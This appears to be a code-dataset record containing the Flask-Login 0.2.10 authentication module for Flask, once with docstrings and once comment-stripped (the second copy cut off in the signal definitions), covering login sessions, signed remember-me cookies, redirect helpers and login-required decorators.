LOGIN_MESSAGE = u'Please log in to access this page.'
#: The default flash message category to display when users need to log in.
LOGIN_MESSAGE_CATEGORY = 'message'
#: The default flash message to display when users need to reauthenticate.
REFRESH_MESSAGE = u'Please reauthenticate to access this page.'
#: The default flash message category to display when users need to
#: reauthenticate.
REFRESH_MESSAGE_CATEGORY = 'message'
#: The default attribute to retreive the unicode id of the user
ID_ATTRIBUTE = 'get_id'
#: Default name of the auth header (``Authorization``)
AUTH_HEADER_NAME = 'Authorization'
class LoginManager(object):
'''
This object is used to hold the settings used for logging in. Instances of
:class:`LoginManager` are *not* bound to specific apps, so you can create
one in the main body of your code and then bind it to your
app in a factory function.
'''
def __init__(self, app=None, add_context_processor=True):
#: A class or factory function that produces an anonymous user, which
#: is used when no one is logged in.
self.anonymous_user = AnonymousUserMixin
#: The name of the view to redirect to when the user needs to log in.
#: (This can be an absolute URL as well, if your authentication
#: machinery is external to your application.)
self.login_view = None
#: The message to flash when a user is redirected to the login page.
self.login_message = LOGIN_MESSAGE
#: The message category to flash when a user is redirected to the login
#: page.
self.login_message_category = LOGIN_MESSAGE_CATEGORY
#: The name of the view to redirect to when the user needs to
#: reauthenticate.
self.refresh_view = None
#: The message to flash when a user is redirected to the 'needs
#: refresh' page.
self.needs_refresh_message = REFRESH_MESSAGE
#: The message category to flash when a user is redirected to the
#: 'needs refresh' page.
self.needs_refresh_message_category = REFRESH_MESSAGE_CATEGORY
#: The mode to use session protection in. This can be either
#: ``'basic'`` (the default) or ``'strong'``, or ``None`` to disable
#: it.
self.session_protection = 'basic'
#: If present, used to translate flash messages ``self.login_message``
#: and ``self.needs_refresh_message``
self.localize_callback = None
self.token_callback = None
self.user_callback = None
self.unauthorized_callback = None
self.needs_refresh_callback = None
self.id_attribute = ID_ATTRIBUTE
self.header_callback = None
self.request_callback = None
if app is not None:
self.init_app(app, add_context_processor)
def setup_app(self, app, add_context_processor=True): # pragma: no cover
'''
This method has been deprecated. Please use
:meth:`LoginManager.init_app` instead.
'''
warnings.warn('Warning setup_app is deprecated. Please use init_app.',
DeprecationWarning)
self.init_app(app, add_context_processor)
def init_app(self, app, add_context_processor=True):
'''
Configures an application. This registers an `after_request` call, and
attaches this `LoginManager` to it as `app.login_manager`.
:param app: The :class:`flask.Flask` object to configure.
:type app: :class:`flask.Flask`
:param add_context_processor: Whether to add a context processor to
the app that adds a `current_user` variable to the template.
Defaults to ``True``.
:type add_context_processor: bool
'''
app.login_manager = self
app.after_request(self._update_remember_cookie)
self._login_disabled = app.config.get('LOGIN_DISABLED',
app.config.get('TESTING', False))
if add_context_processor:
app.context_processor(_user_context_processor)
def unauthorized(self):
'''
This is called when the user is required to log in. If you register a
callback with :meth:`LoginManager.unauthorized_handler`, then it will
be called. Otherwise, it will take the following actions:
- Flash :attr:`LoginManager.login_message` to the user.
- Redirect the user to `login_view`. (The page they were attempting
to access will be passed in the ``next`` query string variable,
so you can redirect there if present instead of the homepage.)
If :attr:`LoginManager.login_view` is not defined, then it will simply
raise a HTTP 401 (Unauthorized) error instead.
This should be returned from a view or before/after_request function,
otherwise the redirect will have no effect.
'''
user_unauthorized.send(current_app._get_current_object())
if self.unauthorized_callback:
return self.unauthorized_callback()
if not self.login_view:
abort(401)
if self.login_message:
if self.localize_callback is not None:
flash(self.localize_callback(self.login_message),
category=self.login_message_category)
else:
flash(self.login_message, category=self.login_message_category)
return redirect(login_url(self.login_view, request.url))
def user_loader(self, callback):
'''
This sets the callback for reloading a user from the session. The
function you set should take a user ID (a ``unicode``) and return a
user object, or ``None`` if the user does not exist.
:param callback: The callback for retrieving a user object.
:type callback: unicode
'''
self.user_callback = callback
return callback
def header_loader(self, callback):
'''
This sets the callback for loading a user from a header value.
The function you set should take an authentication token and
return a user object, or `None` if the user does not exist.
:param callback: The callback for retrieving a user object.
'''
self.header_callback = callback
return callback
def request_loader(self, callback):
'''
This sets the callback for loading a user from a Flask request.
The function you set should take Flask request object and
return a user object, or `None` if the user does not exist.
:param callback: The callback for retrieving a user object.
'''
self.request_callback = callback
return callback
def token_loader(self, callback):
'''
This sets the callback for loading a user from an authentication
token. The function you set should take an authentication token
(a ``unicode``, as returned by a user's `get_auth_token` method) and
return a user object, or ``None`` if the user does not exist.
:param callback: The callback for retrieving a user object.
:type callback: unicode
'''
self.token_callback = callback
return callback
def unauthorized_handler(self, callback):
'''
This will set the callback for the `unauthorized` method, which among
other things is used by `login_required`. It takes no arguments, and
should return a response to be sent to the user instead of their
normal view.
:param callback: The callback for unauthorized users.
:type callback: function
'''
self.unauthorized_callback = callback
return callback
def needs_refresh_handler(self, callback):
'''
This will set the callback for the `needs_refresh` method, which among
other things is used by `fresh_login_required`. It takes no arguments,
and should return a response to be sent to the user instead of their
normal view.
:param callback: The callback for unauthorized users.
:type callback: function
'''
self.needs_refresh_callback = callback
return callback
def needs_refresh(self):
'''
This is called when the user is logged in, but they need to be
reauthenticated because their session is stale. If you register a
callback with `needs_refresh_handler`, then it will be called.
Otherwise, it will take the following actions:
- Flash :attr:`LoginManager.needs_refresh_message` to the user.
- Redirect the user to :attr:`LoginManager.refresh_view`. (The page
they were attempting to access will be passed in the ``next``
query string variable, so you can redirect there if present
instead of the homepage.)
If :attr:`LoginManager.refresh_view` is not defined, then it will
simply raise a HTTP 403 (Forbidden) error instead.
This should be returned from a view or before/after_request function,
otherwise the redirect will have no effect.
'''
user_needs_refresh.send(current_app._get_current_object())
if self.needs_refresh_callback:
return self.needs_refresh_callback()
if not self.refresh_view:
abort(403)
if self.localize_callback is not None:
flash(self.localize_callback(self.needs_refresh_message),
category=self.needs_refresh_message_category)
else:
flash(self.needs_refresh_message,
category=self.needs_refresh_message_category)
return redirect(login_url(self.refresh_view, request.url))
def reload_user(self, user=None):
ctx = _request_ctx_stack.top
if user is None:
user_id = session.get('user_id')
if user_id is None:
ctx.user = self.anonymous_user()
else:
user = self.user_callback(user_id)
if user is None:
logout_user()
else:
ctx.user = user
else:
ctx.user = user
def _load_user(self):
'''Loads user from session or remember_me cookie as applicable'''
user_accessed.send(current_app._get_current_object())
# first check SESSION_PROTECTION
config = current_app.config
if config.get('SESSION_PROTECTION', self.session_protection):
deleted = self._session_protection()
if deleted:
return self.reload_user()
# If a remember cookie is set, and the session is not, move the
# cookie user ID to the session.
#
# However, the session may have been set if the user has been
# logged out on this request, 'remember' would be set to clear,
# so we should check for that and not restore the session.
is_missing_user_id = 'user_id' not in session
if is_missing_user_id:
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
header_name = config.get('AUTH_HEADER_NAME', AUTH_HEADER_NAME)
has_cookie = (cookie_name in request.cookies and
session.get('remember') != 'clear')
if has_cookie:
return self._load_from_cookie(request.cookies[cookie_name])
elif header_name in request.headers:
return self._load_from_header(request.headers[header_name])
else:
return self._load_from_request(request)
return self.reload_user()
def _session_protection(self):
sess = session._get_current_object()
ident = _create_identifier()
app = current_app._get_current_object()
mode = app.config.get('SESSION_PROTECTION', self.session_protection)
# if there is no '_id', then take the current one for good
if '_id' not in sess:
sess['_id'] = ident
# if the sess is empty, it's an anonymous user, or just logged out
# so we can skip this, unless 'strong' protection is active,
# in which case we need to double check for the remember me token
check_protection = sess or mode == 'strong'
if check_protection and ident != sess.get('_id', None):
if mode == 'basic' or sess.permanent:
sess['_fresh'] = False
session_protected.send(app)
return False
elif mode == 'strong':
sess.clear()
sess['remember'] = 'clear'
session_protected.send(app)
return True
return False
def _load_from_cookie(self, cookie):
if self.token_callback:
user = self.token_callback(cookie)
if user is not None:
session['user_id'] = getattr(user, self.id_attribute)()
session['_fresh'] = False
_request_ctx_stack.top.user = user
else:
self.reload_user()
else:
user_id = decode_cookie(cookie)
if user_id is not None:
session['user_id'] = user_id
session['_fresh'] = False
self.reload_user()
if _request_ctx_stack.top.user is not None:
app = current_app._get_current_object()
user_loaded_from_cookie.send(app, user=_get_user())
def _load_from_header(self, header):
user = None
if self.header_callback:
user = self.header_callback(header)
if user is not None:
self.reload_user(user=user)
app = current_app._get_current_object()
user_loaded_from_header.send(app, user=_get_user())
else:
self.reload_user()
def _load_from_request(self, request):
user = None
if self.request_callback:
user = self.request_callback(request)
if user is not None:
self.reload_user(user=user)
app = current_app._get_current_object()
user_loaded_from_request.send(app, user=_get_user())
else:
self.reload_user()
def _update_remember_cookie(self, response):
# Don't modify the session unless there's something to do.
if 'remember' in session:
operation = session.pop('remember', None)
if operation == 'set' and 'user_id' in session:
self._set_cookie(response)
elif operation == 'clear':
self._clear_cookie(response)
return response
def _set_cookie(self, response):
# cookie settings
config = current_app.config
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
duration = config.get('REMEMBER_COOKIE_DURATION', COOKIE_DURATION)
domain = config.get('REMEMBER_COOKIE_DOMAIN')
secure = config.get('REMEMBER_COOKIE_SECURE', COOKIE_SECURE)
httponly = config.get('REMEMBER_COOKIE_HTTPONLY', COOKIE_HTTPONLY)
# prepare data
if self.token_callback:
data = current_user.get_auth_token()
else:
data = encode_cookie(str(session['user_id']))
expires = datetime.utcnow() + duration
# actually set it
response.set_cookie(cookie_name,
value=data,
expires=expires,
domain=domain,
secure=secure,
httponly=httponly)
def _clear_cookie(self, response):
config = current_app.config
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
domain = config.get('REMEMBER_COOKIE_DOMAIN')
response.delete_cookie(cookie_name, domain=domain)
class UserMixin(object):
'''
This provides default implementations for the methods that Flask-Login
expects user objects to have.
'''
def is_active(self):
return True
def is_authenticated(self):
return True
def is_anonymous(self):
return False
def get_id(self):
try:
return unicode(self.id)
except AttributeError:
raise NotImplementedError('No `id` attribute - override `get_id`')
def __eq__(self, other):
'''
Checks the equality of two `UserMixin` objects using `get_id`.
'''
if isinstance(other, UserMixin):
return self.get_id() == other.get_id()
return NotImplemented
def __ne__(self, other):
'''
Checks the inequality of two `UserMixin` objects using `get_id`.
'''
equal = self.__eq__(other)
if equal is NotImplemented:
return NotImplemented
return not equal
if sys.version_info[0] != 2: # pragma: no cover
# Python 3 implicitly set __hash__ to None if we override __eq__
# We set it back to its default implementation
__hash__ = object.__hash__
class AnonymousUserMixin(object):
'''
This is the default object for representing an anonymous user.
'''
def is_authenticated(self):
return False
def is_active(self):
return False
def is_anonymous(self):
return True
def get_id(self):
return
def encode_cookie(payload):
'''
This will encode a ``unicode`` value into a cookie, and sign that cookie
with the app's secret key.
:param payload: The value to encode, as `unicode`.
:type payload: unicode
'''
return u'{0}|{1}'.format(payload, _cookie_digest(payload))
def decode_cookie(cookie):
'''
This decodes a cookie given by `encode_cookie`. If verification of the
cookie fails, ``None`` will be implicitly returned.
:param cookie: An encoded cookie.
:type cookie: str
'''
try:
payload, digest = cookie.rsplit(u'|', 1)
if hasattr(digest, 'decode'):
digest = digest.decode('ascii') # pragma: no cover
except ValueError:
return
if safe_str_cmp(_cookie_digest(payload), digest):
return payload
def make_next_param(login_url, current_url):
'''
Reduces the scheme and host from a given URL so it can be passed to
the given `login` URL more efficiently.
:param login_url: The login URL being redirected to.
:type login_url: str
:param current_url: The URL to reduce.
:type current_url: str
'''
l = urlparse(login_url)
c = urlparse(current_url)
if (not l.scheme or l.scheme == c.scheme) and \
(not l.netloc or l.netloc == c.netloc):
return urlunparse(('', '', c.path, c.params, c.query, ''))
return current_url
def login_url(login_view, next_url=None, next_field='next'):
'''
Creates a URL for redirecting to a login page. If only `login_view` is
provided, this will just return the URL for it. If `next_url` is provided,
however, this will append a ``next=URL`` parameter to the query string
so that the login view can redirect back to that URL.
:param login_view: The name of the login view. (Alternately, the actual
URL to the login view.)
:type login_view: str
:param next_url: The URL to give the login view for redirection.
:type next_url: str
:param next_field: What field to store the next URL in. (It defaults to
``next``.)
:type next_field: str
'''
if login_view.startswith(('https://', 'http://', '/')):
base = login_view
else:
base = url_for(login_view)
if next_url is None:
return base
parts = list(urlparse(base))
md = url_decode(parts[4])
md[next_field] = make_next_param(base, next_url)
parts[4] = url_encode(md, sort=True)
return urlunparse(parts)
def make_secure_token(*args, **options):
'''
This will create a secure token that you can use as an authentication
token for your users. It uses heavy-duty HMAC encryption to prevent people
from guessing the information. (To make it even more effective, if you
will never need to regenerate the token, you can pass some random data
as one of the arguments.)
:param \*args: The data to include in the token.
:type args: args
:param \*\*options: To manually specify a secret key, pass ``key=THE_KEY``.
Otherwise, the ``current_app`` secret key will be used.
:type \*\*options: kwargs
'''
key = options.get('key')
key = _secret_key(key)
l = [s if isinstance(s, bytes) else s.encode('utf-8') for s in args]
payload = b'\0'.join(l)
token_value = hmac.new(key, payload, sha1).hexdigest()
if hasattr(token_value, 'decode'): # pragma: no cover
token_value = token_value.decode('utf-8') # ensure bytes
return token_value
def login_fresh():
'''
This returns ``True`` if the current login is fresh.
'''
return session.get('_fresh', False)
def login_user(user, remember=False, force=False):
'''
Logs a user in. You should pass the actual user object to this. If the
user's `is_active` method returns ``False``, they will not be logged in
unless `force` is ``True``.
This will return ``True`` if the log in attempt succeeds, and ``False`` if
it fails (i.e. because the user is inactive).
:param user: The user object to log in.
:type user: object
:param remember: Whether to remember the user after their session expires.
Defaults to ``False``.
:type remember: bool
:param force: If the user is inactive, setting this to ``True`` will log
them in regardless. Defaults to ``False``.
:type force: bool
'''
if not force and not user.is_active():
return False
user_id = getattr(user, current_app.login_manager.id_attribute)()
session['user_id'] = user_id
session['_fresh'] = True
session['_id'] = _create_identifier()
if remember:
session['remember'] = 'set'
_request_ctx_stack.top.user = user
user_logged_in.send(current_app._get_current_object(), user=_get_user())
return True
def logout_user():
'''
Logs a user out. (You do not need to pass the actual user.) This will
also clean up the remember me cookie if it exists.
'''
if 'user_id' in session:
session.pop('user_id')
if '_fresh' in session:
session.pop('_fresh')
cookie_name = current_app.config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
if cookie_name in request.cookies:
session['remember'] = 'clear'
user = _get_user()
if user and not user.is_anonymous():
user_logged_out.send(current_app._get_current_object(), user=user)
current_app.login_manager.reload_user()
return True
def confirm_login():
'''
This sets the current session as fresh. Sessions become stale when they
are reloaded from a cookie.
'''
session['_fresh'] = True
session['_id'] = _create_identifier()
user_login_confirmed.send(current_app._get_current_object())
def login_required(func):
'''
If you decorate a view with this, it will ensure that the current user is
logged in and authenticated before calling the actual view. (If they are
not, it calls the :attr:`LoginManager.unauthorized` callback.) For
example::
@app.route('/post')
@login_required
def post():
pass
If there are only certain times you need to require that your user is
logged in, you can do so with::
if not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
...which is essentially the code that this function adds to your views.
It can be convenient to globally turn off authentication when unit
testing. To enable this, if either of the application
configuration variables `LOGIN_DISABLED` or `TESTING` is set to
`True`, this decorator will be ignored.
:param func: The view function to decorate.
:type func: function
'''
@wraps(func)
def decorated_view(*args, **kwargs):
if current_app.login_manager._login_disabled:
return func(*args, **kwargs)
elif not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
return func(*args, **kwargs)
return decorated_view
def fresh_login_required(func):
'''
If you decorate a view with this, it will ensure that the current user's
login is fresh - i.e. there session was not restored from a 'remember me'
cookie. Sensitive operations, like changing a password or e-mail, should
be protected with this, to impede the efforts of cookie thieves.
If the user is not authenticated, :meth:`LoginManager.unauthorized` is
called as normal. If they are authenticated, but their session is not
fresh, it will call :meth:`LoginManager.needs_refresh` instead. (In that
case, you will need to provide a :attr:`LoginManager.refresh_view`.)
Behaves identically to the :func:`login_required` decorator with respect
to configutation variables.
:param func: The view function to decorate.
:type func: function
'''
@wraps(func)
def decorated_view(*args, **kwargs):
if current_app.login_manager._login_disabled:
return func(*args, **kwargs)
elif not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
elif not login_fresh():
return current_app.login_manager.needs_refresh()
return func(*args, **kwargs)
return decorated_view
def _get_user():
if has_request_context() and not hasattr(_request_ctx_stack.top, 'user'):
current_app.login_manager._load_user()
return getattr(_request_ctx_stack.top, 'user', None)
def _cookie_digest(payload, key=None):
key = _secret_key(key)
return hmac.new(key, payload.encode('utf-8'), sha1).hexdigest()
def _get_remote_addr():
address = request.headers.get('X-Forwarded-For', request.remote_addr)
if address is not None:
address = address.encode('utf-8')
return address
def _create_identifier():
user_agent = request.headers.get('User-Agent')
if user_agent is not None:
user_agent = user_agent.encode('utf-8')
base = '{0}|{1}'.format(_get_remote_addr(), user_agent)
if str is bytes:
base = unicode(base, 'utf-8', errors='replace') # pragma: no cover
h = md5()
h.update(base.encode('utf8'))
return h.hexdigest()
def _user_context_processor():
return dict(current_user=_get_user())
def _secret_key(key=None):
if key is None:
key = current_app.config['SECRET_KEY']
if isinstance(key, unicode): # pragma: no cover
key = key.encode('latin1') # ensure bytes
return key
# Signals
#: Sent when a user is logged in. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged in.
user_logged_in = _signals.signal('logged-in')
#: Sent when a user is logged out. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged out.
user_logged_out = _signals.signal('logged-out')
#: Sent when the user is loaded from the cookie. In addition to the app (which
#: is the sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_cookie = _signals.signal('loaded-from-cookie')
#: Sent when the user is loaded from the header. In addition to the app (which
#: is the #: sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_header = _signals.signal('loaded-from-header')
#: Sent when the user is loaded from the request. In addition to the app (which
#: is the #: sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_request = _signals.signal('loaded-from-request')
#: Sent when a user's login is confirmed, marking it as fresh. (It is not
#: called for a normal login.)
#: It receives no additional arguments besides the app.
user_login_confirmed = _signals.signal('login-confirmed')
#: Sent when the `unauthorized` method is called on a `LoginManager`. It
#: receives no additional arguments besides the app.
user_unauthorized = _signals.signal('unauthorized')
#: Sent when the `needs_refresh` method is called on a `LoginManager`. It
#: receives no additional arguments besides the app.
user_needs_refresh = _signals.signal('needs-refresh')
#: Sent whenever the user is accessed/loaded
#: receives no additional arguments besides the app.
user_accessed = _signals.signal('accessed')
#: Sent whenever session protection takes effect, and a session is either
#: marked non-fresh or deleted. It receives no additional arguments besides
#: the app.
session_protected = _signals.signal('session-protected')
| 34.902384
| 79
| 0.652769
|
__version_info__ = ('0', '2', '10')
__version__ = '.'.join(__version_info__)
__author__ = 'Matthew Frazier'
__license__ = 'MIT/X11'
__copyright__ = '(c) 2011 by Matthew Frazier'
__all__ = ['LoginManager']
from flask import (_request_ctx_stack, abort, current_app, flash, redirect,
request, session, url_for, has_request_context)
from flask.signals import Namespace
from werkzeug.local import LocalProxy
from werkzeug.security import safe_str_cmp
from werkzeug.urls import url_decode, url_encode
from datetime import datetime, timedelta
from functools import wraps
from hashlib import sha1, md5
import hmac
import warnings
import sys
if sys.version < '3':
from urlparse import urlparse, urlunparse
else:
from urllib.parse import urlparse, urlunparse
unicode = str
_signals = Namespace()
current_user = LocalProxy(lambda: _get_user())
COOKIE_NAME = 'remember_token'
COOKIE_DURATION = timedelta(days=365)
COOKIE_SECURE = None
COOKIE_HTTPONLY = False
LOGIN_MESSAGE = u'Please log in to access this page.'
LOGIN_MESSAGE_CATEGORY = 'message'
REFRESH_MESSAGE = u'Please reauthenticate to access this page.'
REFRESH_MESSAGE_CATEGORY = 'message'
ID_ATTRIBUTE = 'get_id'
AUTH_HEADER_NAME = 'Authorization'
class LoginManager(object):
def __init__(self, app=None, add_context_processor=True):
self.anonymous_user = AnonymousUserMixin
self.login_view = None
self.login_message = LOGIN_MESSAGE
self.login_message_category = LOGIN_MESSAGE_CATEGORY
self.refresh_view = None
#: refresh' page.
self.needs_refresh_message = REFRESH_MESSAGE
self.needs_refresh_message_category = REFRESH_MESSAGE_CATEGORY
self.session_protection = 'basic'
self.localize_callback = None
self.token_callback = None
self.user_callback = None
self.unauthorized_callback = None
self.needs_refresh_callback = None
self.id_attribute = ID_ATTRIBUTE
self.header_callback = None
self.request_callback = None
if app is not None:
self.init_app(app, add_context_processor)
def setup_app(self, app, add_context_processor=True):
warnings.warn('Warning setup_app is deprecated. Please use init_app.',
DeprecationWarning)
self.init_app(app, add_context_processor)
def init_app(self, app, add_context_processor=True):
app.login_manager = self
app.after_request(self._update_remember_cookie)
self._login_disabled = app.config.get('LOGIN_DISABLED',
app.config.get('TESTING', False))
if add_context_processor:
app.context_processor(_user_context_processor)
def unauthorized(self):
user_unauthorized.send(current_app._get_current_object())
if self.unauthorized_callback:
return self.unauthorized_callback()
if not self.login_view:
abort(401)
if self.login_message:
if self.localize_callback is not None:
flash(self.localize_callback(self.login_message),
category=self.login_message_category)
else:
flash(self.login_message, category=self.login_message_category)
return redirect(login_url(self.login_view, request.url))
def user_loader(self, callback):
self.user_callback = callback
return callback
def header_loader(self, callback):
self.header_callback = callback
return callback
def request_loader(self, callback):
self.request_callback = callback
return callback
def token_loader(self, callback):
self.token_callback = callback
return callback
def unauthorized_handler(self, callback):
self.unauthorized_callback = callback
return callback
def needs_refresh_handler(self, callback):
self.needs_refresh_callback = callback
return callback
def needs_refresh(self):
user_needs_refresh.send(current_app._get_current_object())
if self.needs_refresh_callback:
return self.needs_refresh_callback()
if not self.refresh_view:
abort(403)
if self.localize_callback is not None:
flash(self.localize_callback(self.needs_refresh_message),
category=self.needs_refresh_message_category)
else:
flash(self.needs_refresh_message,
category=self.needs_refresh_message_category)
return redirect(login_url(self.refresh_view, request.url))
def reload_user(self, user=None):
ctx = _request_ctx_stack.top
if user is None:
user_id = session.get('user_id')
if user_id is None:
ctx.user = self.anonymous_user()
else:
user = self.user_callback(user_id)
if user is None:
logout_user()
else:
ctx.user = user
else:
ctx.user = user
def _load_user(self):
user_accessed.send(current_app._get_current_object())
config = current_app.config
if config.get('SESSION_PROTECTION', self.session_protection):
deleted = self._session_protection()
if deleted:
return self.reload_user()
is_missing_user_id = 'user_id' not in session
if is_missing_user_id:
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
header_name = config.get('AUTH_HEADER_NAME', AUTH_HEADER_NAME)
has_cookie = (cookie_name in request.cookies and
session.get('remember') != 'clear')
if has_cookie:
return self._load_from_cookie(request.cookies[cookie_name])
elif header_name in request.headers:
return self._load_from_header(request.headers[header_name])
else:
return self._load_from_request(request)
return self.reload_user()
def _session_protection(self):
sess = session._get_current_object()
ident = _create_identifier()
app = current_app._get_current_object()
mode = app.config.get('SESSION_PROTECTION', self.session_protection)
if '_id' not in sess:
sess['_id'] = ident
# so we can skip this, unless 'strong' protection is active,
# in which case we need to double check for the remember me token
check_protection = sess or mode == 'strong'
if check_protection and ident != sess.get('_id', None):
if mode == 'basic' or sess.permanent:
sess['_fresh'] = False
session_protected.send(app)
return False
elif mode == 'strong':
sess.clear()
sess['remember'] = 'clear'
session_protected.send(app)
return True
return False
def _load_from_cookie(self, cookie):
if self.token_callback:
user = self.token_callback(cookie)
if user is not None:
session['user_id'] = getattr(user, self.id_attribute)()
session['_fresh'] = False
_request_ctx_stack.top.user = user
else:
self.reload_user()
else:
user_id = decode_cookie(cookie)
if user_id is not None:
session['user_id'] = user_id
session['_fresh'] = False
self.reload_user()
if _request_ctx_stack.top.user is not None:
app = current_app._get_current_object()
user_loaded_from_cookie.send(app, user=_get_user())
def _load_from_header(self, header):
user = None
if self.header_callback:
user = self.header_callback(header)
if user is not None:
self.reload_user(user=user)
app = current_app._get_current_object()
user_loaded_from_header.send(app, user=_get_user())
else:
self.reload_user()
def _load_from_request(self, request):
user = None
if self.request_callback:
user = self.request_callback(request)
if user is not None:
self.reload_user(user=user)
app = current_app._get_current_object()
user_loaded_from_request.send(app, user=_get_user())
else:
self.reload_user()
def _update_remember_cookie(self, response):
# Don't modify the session unless there's something to do.
if 'remember' in session:
operation = session.pop('remember', None)
if operation == 'set' and 'user_id' in session:
self._set_cookie(response)
elif operation == 'clear':
self._clear_cookie(response)
return response
def _set_cookie(self, response):
# cookie settings
config = current_app.config
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
duration = config.get('REMEMBER_COOKIE_DURATION', COOKIE_DURATION)
domain = config.get('REMEMBER_COOKIE_DOMAIN')
secure = config.get('REMEMBER_COOKIE_SECURE', COOKIE_SECURE)
httponly = config.get('REMEMBER_COOKIE_HTTPONLY', COOKIE_HTTPONLY)
# prepare data
if self.token_callback:
data = current_user.get_auth_token()
else:
data = encode_cookie(str(session['user_id']))
expires = datetime.utcnow() + duration
# actually set it
response.set_cookie(cookie_name,
value=data,
expires=expires,
domain=domain,
secure=secure,
httponly=httponly)
def _clear_cookie(self, response):
config = current_app.config
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
domain = config.get('REMEMBER_COOKIE_DOMAIN')
response.delete_cookie(cookie_name, domain=domain)
class UserMixin(object):
def is_active(self):
return True
def is_authenticated(self):
return True
def is_anonymous(self):
return False
def get_id(self):
try:
return unicode(self.id)
except AttributeError:
raise NotImplementedError('No `id` attribute - override `get_id`')
def __eq__(self, other):
if isinstance(other, UserMixin):
return self.get_id() == other.get_id()
return NotImplemented
def __ne__(self, other):
equal = self.__eq__(other)
if equal is NotImplemented:
return NotImplemented
return not equal
if sys.version_info[0] != 2: # pragma: no cover
# Python 3 implicitly set __hash__ to None if we override __eq__
# We set it back to its default implementation
__hash__ = object.__hash__
class AnonymousUserMixin(object):
def is_authenticated(self):
return False
def is_active(self):
return False
def is_anonymous(self):
return True
def get_id(self):
return
def encode_cookie(payload):
return u'{0}|{1}'.format(payload, _cookie_digest(payload))
def decode_cookie(cookie):
try:
payload, digest = cookie.rsplit(u'|', 1)
if hasattr(digest, 'decode'):
digest = digest.decode('ascii') # pragma: no cover
except ValueError:
return
if safe_str_cmp(_cookie_digest(payload), digest):
return payload
def make_next_param(login_url, current_url):
l = urlparse(login_url)
c = urlparse(current_url)
if (not l.scheme or l.scheme == c.scheme) and \
(not l.netloc or l.netloc == c.netloc):
return urlunparse(('', '', c.path, c.params, c.query, ''))
return current_url
def login_url(login_view, next_url=None, next_field='next'):
if login_view.startswith(('https://', 'http://', '/')):
base = login_view
else:
base = url_for(login_view)
if next_url is None:
return base
parts = list(urlparse(base))
md = url_decode(parts[4])
md[next_field] = make_next_param(base, next_url)
parts[4] = url_encode(md, sort=True)
return urlunparse(parts)
def make_secure_token(*args, **options):
key = options.get('key')
key = _secret_key(key)
l = [s if isinstance(s, bytes) else s.encode('utf-8') for s in args]
payload = b'\0'.join(l)
token_value = hmac.new(key, payload, sha1).hexdigest()
if hasattr(token_value, 'decode'): # pragma: no cover
token_value = token_value.decode('utf-8') # ensure bytes
return token_value
def login_fresh():
return session.get('_fresh', False)
def login_user(user, remember=False, force=False):
if not force and not user.is_active():
return False
user_id = getattr(user, current_app.login_manager.id_attribute)()
session['user_id'] = user_id
session['_fresh'] = True
session['_id'] = _create_identifier()
if remember:
session['remember'] = 'set'
_request_ctx_stack.top.user = user
user_logged_in.send(current_app._get_current_object(), user=_get_user())
return True
def logout_user():
if 'user_id' in session:
session.pop('user_id')
if '_fresh' in session:
session.pop('_fresh')
cookie_name = current_app.config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
if cookie_name in request.cookies:
session['remember'] = 'clear'
user = _get_user()
if user and not user.is_anonymous():
user_logged_out.send(current_app._get_current_object(), user=user)
current_app.login_manager.reload_user()
return True
def confirm_login():
session['_fresh'] = True
session['_id'] = _create_identifier()
user_login_confirmed.send(current_app._get_current_object())
def login_required(func):
@wraps(func)
def decorated_view(*args, **kwargs):
if current_app.login_manager._login_disabled:
return func(*args, **kwargs)
elif not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
return func(*args, **kwargs)
return decorated_view
def fresh_login_required(func):
@wraps(func)
def decorated_view(*args, **kwargs):
if current_app.login_manager._login_disabled:
return func(*args, **kwargs)
elif not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
elif not login_fresh():
return current_app.login_manager.needs_refresh()
return func(*args, **kwargs)
return decorated_view
def _get_user():
if has_request_context() and not hasattr(_request_ctx_stack.top, 'user'):
current_app.login_manager._load_user()
return getattr(_request_ctx_stack.top, 'user', None)
def _cookie_digest(payload, key=None):
key = _secret_key(key)
return hmac.new(key, payload.encode('utf-8'), sha1).hexdigest()
def _get_remote_addr():
address = request.headers.get('X-Forwarded-For', request.remote_addr)
if address is not None:
address = address.encode('utf-8')
return address
def _create_identifier():
user_agent = request.headers.get('User-Agent')
if user_agent is not None:
user_agent = user_agent.encode('utf-8')
base = '{0}|{1}'.format(_get_remote_addr(), user_agent)
if str is bytes:
base = unicode(base, 'utf-8', errors='replace') # pragma: no cover
h = md5()
h.update(base.encode('utf8'))
return h.hexdigest()
def _user_context_processor():
return dict(current_user=_get_user())
def _secret_key(key=None):
if key is None:
key = current_app.config['SECRET_KEY']
if isinstance(key, unicode): # pragma: no cover
key = key.encode('latin1') # ensure bytes
return key
# Signals
#: Sent when a user is logged in. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged in.
user_logged_in = _signals.signal('logged-in')
#: Sent when a user is logged out. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged out.
user_logged_out = _signals.signal('logged-out')
#: Sent when the user is loaded from the cookie. In addition to the app (which
#: is the sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_cookie = _signals.signal('loaded-from-cookie')
#: Sent when the user is loaded from the header. In addition to the app (which
#: is the #: sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_header = _signals.signal('loaded-from-header')
#: Sent when the user is loaded from the request. In addition to the app (which
#: is the #: sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_request = _signals.signal('loaded-from-request')
#: Sent when a user's login is confirmed, marking it as fresh. (It is not
user_login_confirmed = _signals.signal('login-confirmed')
user_unauthorized = _signals.signal('unauthorized')
user_needs_refresh = _signals.signal('needs-refresh')
user_accessed = _signals.signal('accessed')
